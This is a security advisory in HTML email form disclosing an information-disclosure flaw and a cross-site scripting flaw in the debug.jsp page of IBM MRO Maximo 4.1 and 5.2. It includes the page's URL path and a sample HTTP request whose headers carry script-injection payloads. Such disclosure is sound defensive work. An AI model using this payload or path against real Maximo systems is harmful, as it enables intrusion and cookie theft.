<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns:p="urn:schemas-microsoft-com:office:powerpoint" xmlns:a="urn:schemas-microsoft-com:office:access" xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882" xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882" xmlns:rs="urn:schemas-microsoft-com:rowset" xmlns:z="#RowsetSchema" xmlns:b="urn:schemas-microsoft-com:office:publisher" xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet" xmlns:oa="urn:schemas-microsoft-com:office:activation" xmlns:html="http://www.w3.org/TR/REC-html40" xmlns:q="http://schemas.xmlsoap.org/soap/envelope/" xmlns:D="DAV:" xmlns:x2="http://schemas.microsoft.com/office/excel/2003/xml" xmlns:ois="http://schemas.microsoft.com/sharepoint/soap/ois/" xmlns:dir="http://schemas.microsoft.com/sharepoint/soap/directory/" xmlns:ds="http://www.w3.org/2000/09/xmldsig#" xmlns:dsp="http://schemas.microsoft.com/sharepoint/dsp" xmlns:udc="http://schemas.microsoft.com/data/udc" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:sub="http://schemas.microsoft.com/sharepoint/soap/2002/1/alerts/" xmlns:ec="http://www.w3.org/2001/04/xmlenc#" xmlns:sp="http://schemas.microsoft.com/sharepoint/" xmlns:sps="http://schemas.microsoft.com/sharepoint/soap/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:udcxf="http://schemas.microsoft.com/data/udc/xmlfile" xmlns:st1="schemas-IBM-com/appscan" xmlns="http://www.w3.org/TR/REC-html40"
xmlns:ns2="http://schemas.microsoft.com/office/2004/12/omml">
<head>
<meta http-equiv=Content-Type content="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<o:SmartTagType namespaceuri="schemas-IBM-com/appscan" name="TestPolicy"
downloadurl="http://www.watchfire.com/"/>
<o:SmartTagType namespaceuri="schemas-IBM-com/appscan" name="Tools"
downloadurl="http://www.watchfire.com/"/>
<o:SmartTagType namespaceuri="schemas-IBM-com/appscan" name="FieldsReference"
downloadurl="http://www.watchfire.com/"/>
<o:SmartTagType namespaceuri="schemas-IBM-com/appscan" name="URLs"
downloadurl="http://www.watchfire.com/"/>
<o:SmartTagType namespaceuri="schemas-IBM-com/appscan" name="ScanData"
downloadurl="http://www.watchfire.com/"/>
<o:SmartTagType namespaceuri="schemas-IBM-com/appscan" name="ApplicationData"
downloadurl="http://www.watchfire.com/"/>
<o:SmartTagType namespaceuri="schemas-IBM-com/appscan" name="Remediation"
downloadurl="http://www.watchfire.com/"/>
<o:SmartTagType namespaceuri="schemas-IBM-com/appscan" name="Issues"
downloadurl="http://www.watchfire.com/"/>
<!--[if !mso]>
<style>
st1\:*{behavior:url(#default#ieooui) }
</style>
<![endif]-->
<style>
<!--p.MSOBODYTEXT
{mso-style-priority:99;}
li.MSOBODYTEXT
{mso-style-priority:99;}
div.MSOBODYTEXT
{mso-style-priority:99;}
a:link
{mso-style-priority:99;}
span.MSOHYPERLINK
{mso-style-priority:99;}
a:visited
{mso-style-priority:99;}
span.MSOHYPERLINKFOLLOWED
{mso-style-priority:99;}
span.BODYTEXTCHAR
{mso-style-priority:99;}
/* Font Definitions */
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;}
@font-face
{font-family:Calibri;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
text-align:justify;
font-size:10.0pt;
font-family:"Courier New";
color:black;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
span.bodytextchar
{font-family:Calibri;}
span.EmailStyle19
{mso-style-type:personal;
font-family:Arial;
color:windowtext;}
span.charchar
{font-family:"Courier New";
color:black;}
span.EmailStyle21
{mso-style-type:personal;
font-family:Calibri;
color:#1F497D;}
span.EmailStyle22
{mso-style-type:personal;
font-family:Arial;
color:navy;}
span.EmailStyle23
{mso-style-type:personal-reply;
font-family:Arial;
color:navy;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple>
<div class=Section1>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Affected
Software/Device: IBM MRO MAXIMO<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Tested Version: 4.1 , 5.2<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Vulnerability: Cross
Site Scripting & Information Disclosure<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Risk: Low / Medium<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Description: MRO Maximo
is a strategic asset and service management system that runs on a number of
databases including Oracle, SQL Server and IBM DB2. It is used by a wide
variety of organizations ranging from municipal and county governments, to
corporations to government contractors. We identified several security problems
which are not reported before during our pen-tests.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>1- Maximo contains publicly
accessible application named debug.jsp. This application discloses useful
information for attackers such <st1:TestPolicy w:st="on"><st1:Tools w:st="on"><st1:FieldsReference
w:st="on"><st1:URLs w:st="on"><st1:ScanData w:st="on"><st1:ApplicationData
w:st="on"><st1:Remediation w:st="on"><st1:Issues w:st="on">as</st1:Issues></st1:Remediation></st1:ApplicationData></st1:ScanData></st1:URLs></st1:FieldsReference></st1:Tools></st1:TestPolicy>
installed OS type and version, full installation path of application. A Remote
attacker can use this information for further attacks.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>http://maximo/jsp/common/system/debug.jsp<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>2 - Debug.jsp is
vulnerable to cross-site scripting, caused by improper validation of values in
HTTP Header such <st1:TestPolicy w:st="on"><st1:Tools w:st="on"><st1:FieldsReference
w:st="on"><st1:URLs w:st="on"><st1:ScanData w:st="on"><st1:ApplicationData
w:st="on"><st1:Remediation w:st="on"><st1:Issues w:st="on">as</st1:Issues></st1:Remediation></st1:ApplicationData></st1:ScanData></st1:URLs></st1:FieldsReference></st1:Tools></st1:TestPolicy>
User-Agent, Cookie, etc. A remote attacker could exploit this vulnerability to
inject malicious script into a Web page which would be executed in a victim's
Web browser within the security context of the hosting Web site, once the page
is viewed. An attacker could use this vulnerability to steal the victim's
cookie-based authentication credentials.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Sample Request:<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>GET
/jsp/common/system/debug.jsp HTTP/1.1<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Accept:
<script>alert('XSS');</script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Accept-Language:
<script>alert('XSS');</script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>UA-CPU:
<script>alert('XSS');</script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Accept-Encoding: <script>alert('XSS');</script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>User-Agent:
<script>alert('XSS');</script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Host: maximo<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Connection: Keep-Alive<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Cookie:
<script>alert('XSS');</script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>Deniz CEVIK<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 color=black face=Verdana><span
style='font-size:10.0pt;font-family:Verdana;color:black'>www.intellectpro.com.tr<o:p></o:p></span></font></p>
</div>
</body>
</html>